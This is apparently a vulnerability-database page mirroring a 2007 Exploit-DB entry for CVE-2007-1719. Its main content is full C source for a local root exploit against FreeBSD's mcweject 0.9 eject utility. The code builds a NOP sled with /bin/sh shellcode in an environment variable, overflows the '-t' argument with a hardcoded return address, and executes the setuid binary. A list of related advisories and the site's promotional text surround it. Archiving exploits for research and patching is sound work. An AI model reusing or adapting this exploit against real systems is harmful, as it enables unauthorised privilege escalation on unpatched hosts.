Lucene search
+L

FreeBSD mcweject 0.9 'Eject' - Local Buffer Overflow / Local Privilege Escalation

🗓️ 26 Mar 2007 00:00:00Reported by harryType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 38 Views

FreeBSD mcweject 0.9 'Eject' local buffer overflow for privilege escalatio

Related
Code
ReporterTitlePublishedViews
Family
freebsd
FreeBSD
mcweject -- exploitable buffer overflow
27 Mar 200700:00
freebsd
cve
CVE
CVE-2007-1719
28 Mar 200700:00
cve
cvelist
Cvelist
CVE-2007-1719
28 Mar 200700:00
cvelist
euvd
EUVD
EUVD-2007-1713
7 Oct 202500:30
euvd
nessus
Tenable Nessus
FreeBSD : mcweject -- exploitable buffer overflow (84d3fbb2-e607-11db-8a32-000c76189c4c)
10 Apr 200700:00
nessus
nvd
NVD
CVE-2007-1719
28 Mar 200700:19
nvd
openvas
OpenVAS
FreeBSD Ports: mcweject
4 Sep 200800:00
openvas
openvas
OpenVAS
FreeBSD Ports: mcweject
4 Sep 200800:00
openvas
prion
Prion
Buffer overflow
28 Mar 200700:19
prion
securityvulns
securityvulns
FreeBSD eject buffer overflow
29 Mar 200700:00
securityvulns
// ejecsploit.c - local root exploit for bsd's eject.c
// harry
// vuln found by kokanin (you 31337!!! ;))
// thanks to sacrine and all the other netric guys!!! you rule :)

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define LEN 1264
#define NOP 0x90

extern char** environ;

int main(){

  char buf[LEN];
  char* ptr;
  char* arg[4];
  unsigned int ret, i;
  char shellcode[]="\xeb\x17\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89"
                   "\x43\x0c\x50\x8d\x53\x08\x52\x53\xb0\x3b\x50\xcd"
                   "\x80\xe8\xe4\xff\xff\xff/bin/sh";
  // hardcoded... too boneidle to fix this
  ret = 0xbfbfee16;
  char envshell[4096];
  ptr = envshell;
  for (i = 0; i < 4096 - strlen(shellcode) - 1; i++) *(ptr++) = NOP;
  for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i];
  *(ptr) = 0x0;
  memcpy (envshell, "BLEH=",5);
  putenv(envshell);

  memset (buf, 0x41, sizeof(buf));
  buf[LEN-5] = (char) ( 0x000000ff & ret);
  buf[LEN-4] = (char) ((0x0000ff00 & ret) >> 8);
  buf[LEN-3] = (char) ((0x00ff0000 & ret) >> 16);
  buf[LEN-2] = (char) ((0xff000000 & ret) >> 24);
  buf[LEN-1] = 0x0;

  arg[0] = "/usr/local/sbin/eject";
  arg[1] = "-t";
  arg[2] = buf;
  arg[3] = NULL;

  execve (arg[0], arg, environ);

  return 0;
}

// milw0rm.com [2007-03-26]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

24 Nov 2017 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.2
EPSS0.01259
38